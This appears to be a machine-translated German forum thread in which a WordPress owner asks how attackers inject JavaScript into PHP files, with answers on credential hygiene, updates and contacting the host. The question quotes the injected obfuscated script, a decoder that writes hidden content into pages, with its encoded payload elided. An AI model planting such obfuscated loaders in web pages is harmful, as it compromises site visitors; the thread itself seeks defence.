it-swarm.com.de

Wie schreibe ich ein Skript in meine PHP-Dateien?

Ich habe ein Blog mit WordPress erstellt, jetzt habe ich ein Problem. Angreifer schreiben Javascript-Codes in meine Dateien.

Nehmen wir an, ich habe Lücken in meinen Plugin-Skripten, aber wie können sie in PHP-Dateien geschrieben werden?

hier ist ein Teil der Liste der PHP-Dateien, in denen sie das Skript schreiben (index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)

und dies ist das Javascript, in das sie schreiben

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

Wie kann ich solche Angriffe verhindern?

Ich habe keine Erfahrung mit WordPress, daher wird jede Hilfe sehr nett sein.

Vielen Dank

4
Syom

Hallo @ Syom:

Häufig erhalten Hacker Zugriff, weil Sie den Namen "admin" für Ihren Administrator verwenden und ein leicht zu hackendes Kennwort haben. Oder weil Sie Ihre Software nicht aktualisieren und einige der gefundenen und gepatchten Sicherheitslücken ausnutzen.

Im Folgenden finden Sie eine Reihe von Folien, die ausführlich erläutern, wie Sie Ihre WordPress-Site schützen können, die am vergangenen Wochenende auf dem WordCamp Phoenix vorgestellt wurden:

Hier einige Blogbeiträge von Otto zum Thema:

5
MikeSchinkel

Es gibt mehrere Möglichkeiten:

  • kompromittierte FTP/SSH-Anmeldung;
  • kompromittierte WordPress-Anmeldung;
  • fehlerhafte Server-Sicherheitskonfiguration;
  • kompromittierter Server;
  • eine Art Hintertür installiert;
  • usw.

Sie sollten sich sofort an den Hosting-Support wenden, da es von der Qualität und dem Preis Ihres Hostings abhängt, inwieweit diese helfen.

Abgesehen davon, wenn Sie nicht mit technischen Fähigkeiten vertraut sind, schlage ich vor, jemanden zu suchen, der sich professionell mit der Bereinigung von gehackten Blogs befasst, da Sie sich sonst nicht sicher sind, was Hacking und Sicherheit betrifft.

1
Rarst